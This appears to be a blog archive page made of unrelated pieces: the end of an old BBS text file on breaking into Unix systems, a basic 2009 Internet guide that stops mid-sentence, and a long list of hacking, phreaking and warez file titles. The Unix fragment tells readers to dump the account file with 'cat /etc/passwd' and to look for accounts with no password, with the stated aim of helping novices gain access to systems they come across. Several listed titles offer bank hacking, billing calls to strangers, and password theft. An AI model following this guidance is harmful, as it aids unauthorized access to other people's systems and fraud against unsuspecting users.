TRY FOLLOW BELOW:

WHO IS ON (SHOWS WHO IS CURRENTLY
LOGGED ON THE SYSTEM.)
WRITE NAME (NAME IS THE PERSON YOU
WISH TO CHAT WITH)
TO EXIT CHAT MODE TRY CTRL-D.
EOT=END OF TRANSFER.
LS -A (LIST ALL FILES IN CURRENT
DIRECTORY.)
DU -A (CHECKS AMOUNT OF MEMORY
YOUR FILES USE;DISK USAGE)
CD\NAME (NAME IS THE NAME OF THE
SUB-DIRECTORY YOU CHOOSE)
CD\ (BRINGS YOUR HOME DIRECTORY
TO CURRENT USE)
CAT NAME (NAME IS A FILENAME EITHER
A PROGRAM OR DOCUMENTATION
YOUR USERNAME HAS WRITTEN)
MOST UNIX PROGRAMS ARE WRITTEN
IN THE C LANGUAGE OR PASCAL
SINCE UNIX IS A PROGRAMMERS'
ENVIRONMENT.
ONE OF THE FIRST THINGS DONE ON THE
SYSTEM IS PRINT UP OR CAPTURE (IN A
BUFFER) THE FILE CONTAINING ALL USER
NAMES AND ACCOUNTS. THIS CAN BE DONE
BY DOING THE FOLLOWING COMMAND:

CAT /ETC/PASSWD

IF YOU ARE SUCCESSFUL YOU WILL A LIST
OF ALL ACCOUNTS ON THE SYSTEM. IT
SHOULD LOOK LIKE THIS:

ROOT:HVNSDCF:0:0:ROOT DIR:/:
JOE:MAJDNFD:1:1:JOE COOL:/BIN:/BIN/JOE
HAL::1:2:HAL SMITH:/BIN:/BIN/HAL

THE "ROOT" LINE TELLS THE FOLLOWING
INFO :
LOGIN NAME=ROOT
HVNSDCF = ENCRYPTED PASSWORD
0 = USER GROUP NUMBER
0 = USER NUMBER
ROOT DIR = NAME OF USER
/ = ROOT DIRECTORY

IN THE JOE LOGIN, THE LAST PART
"/BIN/JOE " TELLS US WHICH DIRECTORY
IS HIS HOME DIRECTORY (JOE) IS.

IN THE "HAL" EXAMPLE THE LOGIN NAME IS
FOLLOWED BY 2 COLONS, THAT MEANS THAT
THERE IS NO PASSWORD NEEDED TO GET IN
USING HIS NAME.

CONCLUSION: I HOPE THAT THIS FILE
WILL HELP OTHER NOVICE UNIX HACKERS
OBTAIN ACCESS TO THE UNIX/XENIX
SYSTEMS THAT THEY MAY FIND. THERE IS
STILL WIDE GROWTH IN THE FUTURE OF
UNIX, SO I HOPE USERS WILL NOT ABUSE
ANY SYSTEMS (UNIX OR ANY OTHERS) THAT
THEY MAY HAPPEN ACROSS ON THEIR
JOURNEY ACROSS THE ELECTRONIC HIGHWAYS OF AMERICA. THERE IS MUCH MORE TO BE LEARNED ABOUT THE UNIX SYSTEM THAT I HAVE NOT COVERED. THEY MAY BE FOUND BY BUYING A BOOK ON THE UNIX SYSTEM (HOW I LEARNED) OR IN THE FUTURE I MAY WRITE A PART II TO THIS........ Downloaded from P-80 Systems......

Basic Internet Guide

2009-11-03T01:22:00.001-08:00

The Internet is a computer network made up of thousands of networks worldwide. No one knows exactly how many computers are connected to the Internet. It is certain, however, that these number in the millions.

No one is in charge of the Internet. There are organizations which develop technical aspects of this network and set standards for creating applications on it, but no governing body is in control. The Internet backbone, through which Internet traffic flows, is owned by private companies.

All computers on the Internet communicate with one another using the Transmission Control Protocol/Internet Protocol suite, abbreviated to TCP/IP. Computers on the Internet use a client/server architecture. This means that the remote server machine provides files and services to the user's local client machine. Software can be installed on a client computer to take advantage of the latest access technology.

An Internet user has access to a wide variety of services: electronic mail, file transfer, vast information resources, interest group membership, interactive collaboration, multimedia displays, real-time broadcasting, shopping opportunities, breaking news, and much more.

The Internet consists primarily of a variety of access protocols. Many of these protocols feature programs that allow users to search for and retrieve material made available by the protocol.

--------------------------------------------------------------------------------

COMPONENTS OF THE INTERNET

--------------------------------------------------------------------------------

WORLD WIDE WEB
The World Wide Web (abbreviated as the Web or WWW) is a system of Internet servers that supports hypertext to access several Internet protocols on a single interface. Almost every protocol type available on the Internet is accessible on the Web. This includes e-mail, FTP, Telnet, and Usenet News. In addition to these, the World Wide Web has its own protocol: HyperText Transfer Protocol, or HTTP. These protocols will be explained later in this document.

The World Wide Web provides a single interface for accessing all these protocols. This creates a convenient and user-friendly environment. It is no longer necessary to be conversant in these protocols within separate, command-level environments. The Web gathers together these protocols into a single system. Because of this feature, and because of the Web's ability to work with multimedia and advanced programming languages, the Web is the fastest-growing component of the Internet.

The operation of the Web relies primarily on hypertext as its means of information retrieval. HyperText is a document containing words that connect to other documents. These words are called links and are selectable by the user. A single hypertext document can contain links to many documents. In the context of the Web, words or graphics may serve as links to other documents, images, video, and sound. Links may or may not follow a logical path, as each connection is programmed by the creator of the source document. Overall, the Web contains a complex virtual web of connections among a vast number of documents, graphics, videos, and sounds.

Producing hypertext for the Web is accomplished by creating documents with a language called HyperText Markup Language, or HTML. With HTML, tags are placed within the text to accomplish document formatting, visual features such as font size, italics and bold, and the creation of hypertext links. Graphics and multimedia may also be incorporated into an HTML document. HTML is an evolving language, with new tags being added as each upgrade of the language is developed and released. The World Wide Web Consortium (W3C), led by Web founder Tim Berners-Lee, coordinates the efforts of standardizing HTML. The W3C now calls the language XHTML and considers it to be an application of the XML language standard.

The World Wide Web consists of files, called pages or home pages, containing links to documents and resources throughout the Internet.

The Web provides a vast array of experiences including multimedia presentations, real-time collaboration, interactive pages, radio and television broadcasts, and the automatic "push" of information to a client computer. Programming languages such as Java, JavaScript, Visual Basic, Cold Fusion and XML are extending the capabilities of the Web. A growing amount of information on the Web is served dynamically from content stored in databases. The Web is therefore not a fixed entity, but one that is in a constant state of development and flux.

For more complete information about the World Wide Web, see Understanding The World Wide Web.

E-MAIL
Electronic mail, or e-mail, allows computer users locally and worldwide to exchange messages. Each user of e-mail has a mailbox address to which messages are sent. Messages sent through e-mail can arrive within a matter of seconds.

A powerful aspect of e-mail is the option to send electronic files to a person's e-mail address. Non-ASCII files, known as binary files, may be attached to e-mail messages. These files are referred to as MIME attachments.MIME stands for Multimedia Internet Mail Extension, and was developed to help e-mail software handle a variety of file types. For example, a document created in Microsoft Word can be attached to an e-mail message and retrieved by the recipient with the appropriate e-mail program. Many e-mail programs, including Eudora, Netscape Messenger, and Microsoft Outlook, offer the ability to read files written in HTML, which is itself a MIME type.

TELNET
Telnet is a program that allows you to log into computers on the Internet and use online databases, library catalogs, chat services, and more. There are no graphics in Telnet sessions, just text. To Telnet to a computer, you must know its address. This can consist of words (locis.loc.gov) or numbers (140.147.254.3). Some services require you to connect to a specific port on the remote computer. In this case, type the port number after the Internet address. Example: telnet nri.reston.va.us 185.

Telnet is available on the World Wide Web. Probably the most common Web-based resources available through Telnet have been library catalogs, though most catalogs have since migrated to the Web. A link to a Telnet resource may look like any other link, but it will launch a Telnet session to make the connection. A Telnet program must be installed on your local computer and configured to your Web browser in order to work.

With the increasing popularity of the Web, Telnet has become less frequently used as a means of access to information on the Internet.

FTP
FTP stands for File Transfer Protocol. This is both a program and the method used to transfer files between computers. Anonymous FTP is an option that allows users to transfer files from thousands of host computers on the Internet to their personal computer account. FTP sites contain books, articles, software, games, images, sounds, multimedia, course work, data sets, and more.

If your computer is directly connected to the Internet via an Ethernet cable, you can use one of several PC software programs, such as WS_FTP for Windows, to conduct a file transfer.

FTP transfers can be performed on the World Wide Web without the need for special software. In this case, the Web browser will suffice. Whenever you download software from a Web site to your local machine, you are using FTP. You can also retrieve FTP files via search engines such as FtpFind, located at /http://www.ftpfind.com/. This option is easiest because you do not need to know FTP program commands.

E-MAIL DISCUSSION GROUPS
One of the benefits of the Internet is the opportunity it offers to people worldwide to communicate via e-mail. The Internet is home to a large community of individuals who carry out active discussions organized around topic-oriented forums distributed by e-mail. These are administered by software programs. Probably the most common program is the listserv.

A great variety of topics are covered by listservs, many of them academic in nature. When you subscribe to a listserv, messages from other subscribers are automatically sent to your electronic mailbox. You subscribe to a listserv by sending an e-mail message to a computer program called a listserver. Listservers are located on computer networks throughout the world. This program handles subscription information and distributes messages to and from subscribers. You must have a e-mail account to participate in a listserv discussion group. Visit Tile.net at /http://tile.net/ to see an example of a site that offers a searchablecollection of e-mail discussion groups.

Majordomo and Listproc are two other programs that administer e-mail discussion groups. The commands for subscribing to and managing your list memberships are similar to those of listserv.

USENET NEWS
Usenet News is a global electronic bulletin board system in which millions of computer users exchange information on a vast range of topics. The major difference between Usenet News and e-mail discussion groups is the fact that Usenet messages are stored on central computers, and users must connect to these computers to read or download the messages posted to these groups. This is distinct from e-mail distribution, in which messages arrive in the electronic mailboxes of each list member.

Usenet itself is a set of machines that exchanges messages, or articles, from Usenet discussion forums, called newsgroups. Usenet administrators control their own sites, and decide which (if any) newsgroups to sponsor and which remote newsgroups to allow into the system.

There are thousands of Usenet newsgroups in existence. While many are academic in nature, numerous newsgroups are organized around recreational topics. Much serious computer-related work takes place in Usenet discussions. A small number of e-mail discussion groups also exist as Usenet newsgroups.

The Usenet newsfeed can be read by a variety of newsreader software programs. For example, the Netscape suite comes with a newsreader program called Messenger. Newsreaders are also available as standalone products.

FAQ, RFC, FYI
FAQ stands for Frequently Asked Questions. These are periodic postings to Usenet newsgroups that contain a wealth of information related to the topic of the newsgroup. Many FAQs are quite extensive. FAQs are available by subscribing to individual Usenet newsgroups. A Web-based collection of FAQ resources has been collected by The Internet FAQ Consortium and is available at /http://www.faqs.org/.

RFC stands for Request for Comments. These are documents created by and distributed to the Internet community to help define the nuts and bolts of the Internet. They contain both technical specifications and general information.

FYI stands for For Your Information. These notes are a subset of RFCs and contain information of interest to new Internet users.

Links to indexes of all three of these information resources are available on the University Libraries Web site at /http://library.albany.edu/reference/faqs.html.

CHAT & INSTANT MESSENGING
Chat programs allow users on the Internet to communicate with each other by typing in real time. They are sometimes included as a feature of a Web site, where users can log into the "chat room" to exchange comments and information about the topics addressed on the site. Chat may take other, more wide-ranging forms. For example, America Online is well known for sponsoring a number of topical chat rooms.

Internet Relay Chat (IRC) is a service through which participants can communicate to each other on hundreds of channels. These channels are usually based on specific topics. While many topics are frivolous, substantive conversations are also taking place. To access IRC, you must use an IRC software program.

A variation of chat is the phenomenon of instant messenging. With instant messenging, a user on the Web can contact another user currently logged in and type a conversation. Most famous is America Online's Instant Messenger. ICQ, MSN and Yahoo are other commonly-used chat programs.

Other types of real-time communication are addressed in the tutorial Understanding the World Wide Web.

MUD/MUSH/MOO/MUCK/DUM/MUSE
MUD stands for Multi User Dimension. MUDs, and their variations listed above, are multi-user virtual reality games based on simulated worlds. Traditionally text based, graphical MUDs now exist. There are MUDs of all kinds on the Internet, and many can be joined free of charge. For more information, read one of the FAQs devoted to MUDs available at the FAQ site at

123456789

2009-11-03T01:21:00.000-08:00

#DataVault, Irc Warez (Ty 4 Moving X).txt
-[ How to rip Dynamic Flash Template ]-.txt
10 reasons why PCs crash U must Know.txt
10 Security Enhancements.txt
123456789.txt
16x Dvd+-rw Dl Dvd Writer Comparison Guide.txt
20 Great Google Secrets.txt
23 Ways To Speed WinXP, Not only Defrag.txt
250+ Tech books online.txt
2600 Hertz Single Tone Generator Schematic.txt
36 Graphics & Design Ebooks.txt
8 People Can Use The Same Msn Dial Up Account.txt
A Basic Guide to the Internet.txt
A Basic UNIX Overview.rtf
A BEGINNERS GUIDE TO Hacking Unix.txt
A Cracking Tutorial
A Guide to Internet Security- Becoming an Uebercracker.txt
A Guide to the Easiest Hacking there is.txt
A List of every TeleNet code that there is.txt
A List Of Government BBS Numbers.txt
A List Of Some OF The Most Useful UNIX Hacking Commands.htm
A Novice's Guide to Hacking 2004.txt
A Novice's Guide To Hacking.txt
A Short HACKER SPEAK Glossary.txt
A simple TCP spoofing attack.txt
A Small Guide to Hacking HOTMAIL.txt
A UNIX Hacking Tutorial.txt
A very small tut for RealMedia.txt
A Web Standards Checklist, How to make a proper website.txt
Accessing the bindery files directly.txt
Accessing The Entire Internet On Your 3 Phone, U8110, E616 etc..txt
Advanced Shellcoding Techniques.txt
All about ftp must read.txt
All About Movie Tags (what Is A Dvdrip, Cam Etc.).txt
ALL About Spyware.txt
All mIRC Commands.txt
Almost Everything You Ever Wanted To Know About Security (but.txt
An Architectural Overview of UNIX Network Security.htm
An Extensive Guide to Bell System Man Holes.txt
An Indepth Guide in Hacking UNIX and the concept of Basic Net.txt
An Introduction into TeleScan.txt
An Introduction to Denial of Service.txt
An Introduction to the Computer Underground.txt
An Introductory Guide To TeleNet Commands.txt
Anarchist Cookbook 2004
Anonymity complete GUIDE.rtf
Anonymity of Proxy, Anonymity Of Proxy learn it insideout.txt
Anonymity.txt
ANONYMOUS emails.txt
Anonymous FTP FAQ.htm
ANSIBombs II Tips And Techniques.txt
anti leech hacking tutorial.txt
Area Codes and Time Zones.txt
attacks on networks how to stop.htm
Auto End Tasks to Enable a Proper Shutdown, Win XP Tweak.txt
Automatic Windows Installation, No keypress required!.txt
B.A. regedit.txt
Backdoor.txt
Backdoors.txt
Backtracking EMAIL Messages.txt
Bandwidth Explained!.txt
Basic Networking.txt
BBS CRASHING TECHNIQUES.txt
Becoming A Phreaker - The Quick n' Easy Way.txt
Beep Code Manual.txt
Beep Codes Error Codes.txt
Bell Hell Volume #1.txt
Bell Hell Volume #2.txt
Best Keyboard Shortcuts.txt
Big Brother And Ndisuio.sys, A new Internet phenomenon.txt
Bin & Cue Simple Tut.txt
BIOS Update Procedure.txt
Bit Torrent Tutorials.txt
Block Adservers.txt
Boot Block Recovery For Free.txt
Boot Winxp Fast.txt
Border And Text Effects In Psp8, For use with PSP8.txt
Breaker B0X.txt
Broken Ie, How to fix it.txt
BRUTE- A brute force approach to hacking Unix passwords.txt
Bulk Editing Of .xxx to .zip or .mp3.txt
BulletProof FTP Server Tutorial.txt
Burn .bin file Without A .cue file.txt
Burn a BIN without a CUE using NERO.txt
Burning Bin & Cue Using Nero.txt
Bust Avoidance For Dipshits.txt
busybox.txt
Bypass Internet Censorship.txt
Calculating Offsets.txt
cannot use my password to get back into Windows XP.txt
Cant See Secure Sites.txt
Caught A Virus.txt
Cellular Listening with a TV .txt
Cellular Telephone Phreaking Phile Series VOL 1.txt
Change Music In The Malibu And The Pole Position, GTA Vice Modders.txt
Change Text on XP Start Button.rtf
Change Text on XP Start Button.txt
Change The Default Location For Installing Apps.txt
Change The Storage Location Of 'my Documents', a bit safer for when your PC crashes....txt
Change Your Ip In Less Then 1 Minute.txt
Changing Default Location For Installing Apps.txt
Check For Dos, Check to see if you are infected..txt
Choosing A Good Domain Name, ya..good name is important!.txt
Choosing An Internet Merchant Account, nice info on Internet Merchant Account...txt
Clear Unwanted Items From Add And Remove.txt
Closing Open Holes, System Security How to close open holes.txt
Closing the Net.txt
CMD Prompt here, add to folder context menu windows xp.txt
COMMON FTP ERROR CODES.txt
Compression and Cracks for Dummies.txt
Computer Acronyms.txt
Computer Bulliten Boards and the Law.txt
Computer Chrime - Current Practices, Problems and Proposed So.txt
Computer eMail and Privacy.txt
Computer Hackers News Articles.txt
Computer Matinence.txt
Computer Rights vs First and Forth Amentment Right.txt
Computer Security.txt
Computer Security_2.txt
Computer Viruii.txt
Computerized Governmental Database Systems Containing Persona.txt
Configuring ZoneAlarm Pro Security Settings, A ZoneAlarm Pro Tutorial.txt
connect A Psx Pad To Pc, Warning soldering is involved...txt
Convert Stubborn Webpage To pdf.txt
Convert To Basic And Dynamic Disks In Windows Xp.txt
Converting Movies To Psp Format.txt
Converting to NTFS.txt
COPS and Robbers-Unix System Security.txt
COPY X BOX GAMES!.txt
Copyright Guides for Photographers.txt
Cracking Bios, use the followin' code.txt
Cracking Zip Password Files.txt
Crap Software Config Settings, How to set-up the firewall.txt
Crash Course in X Windows Security.txt
Create A Huge File.txt
Create A Personal Screen Saver In Win Xp!.txt
Create An Ftp Server On Your Pc With Serv-u.txt
Create Bootable Win XP SP1 CD(nero).txt
Create Bootable XP SP integrated CD.txt
Create One-click Shutdown And Reboot Shortcuts.txt
Creating a Board aka Forum on your own PC !.rtf
Creating Universal Ghost Usb Boot Disk And Cd.txt
Crime and Puzzlement.txt
Cultural Formations in Text-Based Virtual Realties.txt
Cyberspace and the Legal Matrix- Laws or Confusion.txt
Dark Angel's Phunky Virus Writing Guide .txt
Data Capacity of CDs [Tutorial].txt
Debug, Learn how crack windows.txt
Defamation Liability of Computerized Bulliten Board Operators.txt
Delete An undeletable File.txt
Delete Files From The Recent File List In Windows.txt
Dept of Treasury Letter.txt
Digital Camera Guide.txt
Digital Faq -learn Everything About Digital, Capture, Edit and Burning and more.txt
Digital Photo Id Cards, Greate Info.txt
Direct Link To Any Page You Want To In Hotmail.txt
Directx Explained.txt
Disable Compression On Xp, NTFS partition, Disk Cleanup.txt
Disable The Send Error Report, to Microsoft.txt
Disable Windows Logo Key.txt
Discover New Music You'll Probably Love.txt
Do You Want To Learn Maya 6, look, some tutorials.txt
Doom 3 Speed Up, Guaranteed 40% better.txt
Doom3 Simple Tweeks, how to run doom with tweeks.txt
Dos User - No Boot Dos Disk, No Edit.com,How to create Imp Files.txt
Download Free Music legally,, legally.txt
Download from a paypal site without paying a penny!.txt
Download From Ftpz, Using Ftp Search Sitez.txt
Download Mp3's Without Using Filesharing.txt
Download Music And Video With ,edia Player9, quick and easy!.txt
Download Timeframes.txt
Downloading Files, Using Archives And Images.txt
Downloading Windows Media Streams.txt
Drake's Phreaking Tutorial.txt
Dreamweaver Tut That Teaches U, to search a database with phpmysql.txt
Driverguide.com.txt
Dual Boot After The Fact.txt
Dvd Copying-ripping Definitions.txt
DVD Regions Information.txt
Dvd-9 to Dvd+r Dl, Double Layer To Double Layer, 1-1 copies.txt
Easily Disconnect-reconnect From Broadband.txt
Easily Find Serial Numbers On Google.., easy to do and works like a charm..txt
Ebay Hackcracktip.txt
Electronic Bulliten Boards and 'Public Goods' Explainations o.txt
Electropolos - Communication and Comunity on IRC.txt
Eliminate Ie's Autocomplete Reminder.txt
Email Forge, sends email from anyone.txt
Enable Folder and Icon Refresh, Win XP Tweak.txt
Erasing_Your_Presence_From_System_Logs.txt
Ethload User's Guide.txt
Evolution Of Computer Viruses History Of Viruses.txt
Excellent tricks and techniques of Google Hacks.txt
Exploseek, a simple tool to find music on the net.txt
Find Stuff.txt
Finding Missing Files From A Release.txt
Firefox Speed Tweaks.txt
Firefox Tweaks.txt
Firewall Protection how to.rtf
FlashFXP FAQ.txt
Flashget Broadband Tweak.txt
FLASHGET INTEGRATION IN OPERA,MOZILLA,NETSCAPE.txt
FlashGet v1.4 - More Download Simultaneously.txt
Flashing A Video Card Bios [advanced Guide], Step-by-Step Guide for Novice and Expert.txt
Formatting An Hdd, when fdisk won't.txt
Formulating A Company Policy on Access to and Use and Disclos.txt
Free Access To Websites Without Registering.txt
FREE Hosting For WAREZ.txt
FREE Hosting List php, mysql and more.txt
Free Speech in Cyberspace.txt
Free World Dialup.txt
Free X-box Live !.txt
Freebsd Install Guide.txt
Gender Issues in Online Communications.txt
General Keyboard Shortcuts, General Keyboard Shortcuts.txt
Get In Windows 2000 As Administrator.txt
Get the Most Out of Your DVD Recorder.txt
Get The Music You Want To Hear.txt
Get unlimited bandwidth from your host for free.txt
Getting A 1gb Yahoo China Account.txt
Getting Counter-strike Source To Work.txt
getting movies, mp3,games using google.txt
Getting older programs to run on Windows XP.txt
Getting started with Linux for nOObs!.txt
Go to Windows updates anonymously.txt
Google Crack Search.txt
Google secrets.txt
Google Tips & Tricks, (utilizing search engine).txt
Government Computer Security Techniques.txt
Graffiti On Walls 4 Adobe Photoshop Cs 8.0.txt
Guide For Getting Free Stuff.txt
Guide to Hacking with sub7.doc
Guide to IIS Exploitation.txt
Guide to Slipstreaming Service Pack 2.txt
HACKDICT.TXT
Hacker Test.txt
Hackers A-Z.TXT
Hackers Who Break into Computer Systems.txt
hacking and phreaking.doc
Hacking Bank Of America's Home Banking System.txt
Hacking Compuserve Infomation Service.txt
Hacking Faq.txt
Hacking for Dummies Volume 2.doc
Hacking For Newbies.doc
Hacking GTE Telemail.txt
hacking in telnet ftp.rtf
Hacking IRC - The Definitive Guide.txt
hacking on Telnet explained.doc
hacking on XP part 1.doc
hacking on XP part 2.doc
hacking on XP part 3.doc
hacking on XP part 4.doc
hacking on XP part 5.doc
hacking password protected site.doc
Hacking Password Protected Website's.doc
hacking passwords.doc
Hacking PC-Pursuit Codes.txt
Hacking Techniques.txt
Hacking TRW.txt
Hacking TYMNET.txt
Hacking Unix System V's.txt
Hacking VoiceMail Systems.txt
Hacking Wal-Mart Computers.txt
Hacking Webpages.txt
Hard drive Gone Bad.txt
Hardware Firewall.txt
Have Notepad In Send To.txt
have satallite tv for almost free IF not free!!!.txt
Hex, How to turn binary or decimal to hex.txt
Hide Drives and Partitions.txt
How 2 Find EVERYTHING uploaded on Rapidshare.txt
How BT phone cards works.txt
How do I overburn a CD with Nero.txt
How do I remove an extra operating system from by.txt
How do I Test My VirusScan Installation.txt
How Do U See Hidden Files, Using DOS...txt
How Download MP3s from Fanscape.com or other Streaming Audio-Video.txt
How Linux boots.txt
How Long Has Your XP System Been Running.txt
How Phone Phreaks are Caught.txt
How the Traditional Media Clasifications Fail to Protect in t.txt
How To Access Your Folders From Your Taskbar.txt
How To Add A Url Address Bar To The Taskbar.txt
How To Add An Option To Print, the Contents of a Folder!.txt
How To Add Your Own Windows Tips.txt
How to Back Up the Registry.txt
How To Backup Ps2 Games.txt
How to Bill All Of your Fone Calls To Some Poor, Unsuspecting.txt
HOW TO BLOCK PEOPLE ON WINMX WHO SHARE NOTHING.txt
How To Block Websties Without Software, block websites.txt
How To Boot Xp Faster (updated).txt
How to build a black box.txt
how to burn quicker in windows xp.txt
How to Bypass BIOS Passwords.txt
How To Bypass Web Filters, tutorial.txt
HOW TO CAPTURE STREAMING MEDIA.txt
How To Change A Cmos Battery.txt
How to change the serial number used in Windows XP, Valid for XP Corporate.txt
How To Change Thumbnail Size And Quality.txt
How to clear Bios info 2.txt
How to clear Bios info.txt
How To Convert File System, fat - fat32 to ntfs.txt
How To Copy A Dvd Which Will Play On A X Box.txt
How to copy songs from your iPod to your PC.txt
How to crash AOL.txt
How To Customise Your start Button.txt
How To Delete Those Persistent Nasty Files.txt
How to dial out of a UNIX System.txt
How To Directly Go To Inbox, Write Msg, w Hotmail, no need for hotmail today - http users.txt
How To Disable Picture And Fax Viewer.txt
How to do a high Quality DivX rip.txt
How To Download Bittorrent Files.txt
How To Download Directly From Crackdb.com.txt
How To Download Movies, From IRC.txt
How to Download-Upload Files from email.txt
how to edit right click menu.rtf
how to execute chm files in linux.txt
How to Extend the life of the yousendit download links.txt
How to find a remote IP.txt
How To Find Ftp's The Easy Way'.txt
How to find MP3's real quickly.txt
How to find Security Holes.txt
How To Find Serial Numbers On Google.txt
How to fix corrupted files in XP.txt
How to fix Windows Installer problem.txt
How To Get A Free I-pod Or Flat Screen Tv, check it out.txt
How to get a Shell in 24 hours.txt
HOW TO GET ANY WINDOWS PASSWORD.txt
How to Get someones ISP password, Get free internet.txt
How To Get Top Ranking, Search Engines.txt
How to Hack UNIX System V.txt
How To Hack Windows Xp Admin Passwords.txt
How to hack-change your Windows XP Boot Screen.txt
how To Hide Yourself From Network Users!, And give access to only specific users!.txt
How To Increase Download Speeds By 100-200 Kbsec.txt
How to Install and run Windows CE on your USB Stick.txt
How to learn to hack in easy steps.doc
How to login to a C.B.I. System.txt
How To Make 5cds, 10cds Or 2dvds From Official Dow, These are same as Mandrake PowerPack+.txt
How to make a Free Phone Call.txt
How To Make A Kvcd.txt
how to make a new web site.txt
How To Make A Transparent Background, .fla .swf.txt
how to make a VCD from a DivX.txt
How To Make An Animted Logo.txt
How To Make Free Phone Calls.txt
How to make key generators.txt
How To Make Perfect Copies Of Maxis The Sims Discs, CloneCD Style!.txt
How To Make XP Go Faster.txt
How To make your own Radio Station 2.txt
How To Make Your Own Radio Station.txt
How To Make Your Own Radiostation.txt
HOW TO MANUAL - THE END OF DELETERS.txt
How to modify exe files.txt
How To Move Xp Harddrive To New Motherboard.txt
How To optimize DSL-CABLE connection speed.txt
How To Play Movies (divx Etc) With Subs.txt
How to Put an End to Unwanted or Harassing Phone Calls.HAR
How to recover MOST of scratched CD data discs.txt
How to Remove DRM Protection for Video Files.txt
How To Remove Ms Java Vm And Install Sun Java.txt
How To Remove Signin Details Of Msn Passport.txt
How To Remove The Default Admin$ Shares.txt
How to remove the Links folder in IE Favorites.txt
How to Remove WinXP Splash and See Operations.txt
How To Rename Extensions With Ease, with a Renamer.bat file!.txt
How to Rename File Extensions.txt
How To Rename Multiple Files In Winxp.txt
How To Restrict Login Hours Allowed.txt
How to safeguard your files when computer crashes.txt
How to save Windows xp updates.txt
how to search google for RAPIDSHARE links.txt
How To See Hidden Files, Using Dos.txt
How to send ICQ Bombs.txt
How To Set search For All Files In Winxp.txt
How to set up a http server running from you computer.txt
How To Set Up A Proxy In Flashget, As Requested.txt
How to set up a server with Apache , PHP , MySQL , Perl , phpMyAdmin.txt
How To Set Up Direct Connect.txt
HOW TO SET UP FTP SERVER.txt
How To Set Up Proxies In Your Browser.txt
How To Set Zone Alarm Settings!, Fix for ZA ports.txt
How To Setup Your Own Dns (Domain Name Server).txt
How To Speed Up A Slow Computer.txt
How To Speed Up Http Requests On Internet Explorer, as above.txt
How To Stop Spam.txt
How to swear in all languages.txt
How To Unload Cached Dll Files To Free Memory.txt
How to Use and How to Chain Multiple Proxies!.txt
How To Use File Compression In Windows Xp.txt
How To Use Google To Download Mp3's, and applications.....txt
How To Use Newsgroups.txt
How to use the Web to look up information on hacking.doc
How To Use You Gmail With Msn Messenger.txt
How-to Get Videos And Dvds Onto Your Sony PlayStation Portable (PSP) for free.txt
HOWTO Change Windows XP Home to Windows XP Pro.txt
Important Faqs For Sp2.txt
Improve Doom 3's Performances!!, simple but efficient trick for every1.txt
Improve your dialup modem preformance.txt
Increase XP Folder Settings.txt
Information of Hacking AngelFire Websites.txt
Insert Your Serial For Office 2k, auto install office.txt
Install A New Hard-disk.txt
Install Xp From Dos.txt
Installing Apache on Windows.txt
Installing Gentoo Linux, Amazing step by step tutoria.txt
Installing IIS On Windows Xp Pro.txt
Installing Slackware Linux.txt
Instructions For Removal Of Advertising In Msn Messenger.txt
Introduction to Denail of Service.txt
Ip Address Structure, Expilinatin OF IP Address {A short way}.txt
IP addressing, and gaining IP's.txt
IP Addressing.txt
IP how to.rtf
Irc How To Downlaod From, How to downlaod from IRC.txt
Irc Servers On nix, For people who want to start own IRC net.txt
ISSN Numbers- An Introduction.txt
Junk Mail- How Did They All Get My Address.txt
Keep Files Private.txt
Keep Folders Hidden.txt
Keyboard Shortcuts Result in Excel 2000 - Movement.txt
Keyboard Shortcuts, Microsoft Word.txt
Keyboard Shortcuts, must read.txt
Kill Microsoft Instant Messenger.txt
Lamination Tips, Its a Fast TUT......txt
Leet Way To Get Your Ip In Windows Xp.txt
LENROS~1.TXT
LENROS~2.TXT
Linking Your Xbox To Your Computer.txt
Linux Howto's.txt
List Of Sites Not To Go To.txt
Little help for anonymous mailer.txt
Lots Of Windows Xp Tips, Take A Look !.txt
Lyrics With Google.txt
Make A Autorun File For Ur Cd.txt
Make A Batch File To Clean UR PC!!, All In One!!.txt
Make A Roughly 16 Hour Video Dvd.txt
Make Acrobat Reader 6 load faster.txt
Make Dvd Iso From Suse 9.2 5 Cds Iso, Linux mode and Windows mode ISO creation.txt
Make Mp3 Files Smaller Without Losing Quality.txt
Make Your Own Ringtones For Mobile Phone, also logos, wallpaper, etc.txt
Make Your Pc Faster, Guaranteed.txt
MakeXPgoFaster.txt
making a .cue file, in notepad.txt
Making A .txt Executable Server.txt
Making Bootable Floppy Disk to Boot into Windows.txt
Making Cd Version Of Doom3 Into Dvd Version.txt
Making Web Page Fonts Consistent and Uniform.txt
Manage Saved Ie Passwords.txt
Mastering The Windows XP Registry.txt
Maximize Dial-up Modem Settings.txt
MEMETICS.TXT
Microsoft's Really Hidden Files, Reveled Hidden files.txt
MINDVOX.TXT
mIRC Not Just Another Chat Client, Download Anything You Want Almost.txt
mIRCcommands.txt
Misc Linux Tips & Tricks.txt
Missing Administrator Account.txt
Mobile Secret Codes.txt
Modify .exe Files And Crack A Program.txt
More Xp Tips and tricks make your computer more faster.txt
MORRIS~1.TXT
Moving and Removing the Start Button.txt
Msn Messenger & Gmail.txt
My Flash Bookmarks, long list of tutorials.txt
Myth about WPA ( How it is done ), Windows Product Activation Technique.txt
NEIDOR~1.TXT
Nero How To Verify The Validity Of The Sn U Use.txt
NetBios explained.doc
New Pc Or New Motherboard.txt
New Way To Relive Some Zinio File.txt
news groups the how to do.txt
NFS Tracing.txt
Nice list of windows shortcuts.txt
Nightline- FBI,Privacy,and Proposed Wire-Tapping Legislation.txt
No Text Icons.txt
Ntfs Cluster Size, better harddrive performance.txt
NY_2'S Guide to Obtaining An IP Address. .doc
Official Unattended Xp Cd Guide Xp Sp2 @ Msfn.org.txt
Open Windows Explorer To A Different Default Direc.txt
Optimize Broadband & Dsl Connections.txt
Optimize Emule Connection.txt
Organizational Analysis in Computer Science.txt
Outpost Rules, Outpost rules for system & app.txt
Outsmarting System File Protection.txt
Overclocking_Tutorial.txt
Packet Attacks - Version 1.1, { Packet_Attack_Exlained}.txt
Part 0 Dc++.txt
Part 1 Bittorrents.txt
Part 2 Irc (mirc).txt
Part 3 Ftp.txt
Partitioning Your Harddisk With Fdisk.txt
Pc File Extention Listing.txt
Pc Maintenance Guide.txt
Peer2mail Tutorial.txt
Performance Increase Through My Computer.txt
PGP Startup Guide.htm
Phone Systems Tutorial by The Jolly Roger.txt
Phreakers Handbook.txt
Play Games On PS2 Without ModChip.txt
Play On A Bnet Emulator, and f off cd key check =).txt
Port Numbers.txt
Presumed Guilty.txt
Problem With Internet Navigation, Clean Host File.txt
Proxy how to.rtf
Quick Fix For Spyware, Try This Before Doing Surgery on Your OS.txt
Quick Msc.txt
Quick Phone Modifications.txt
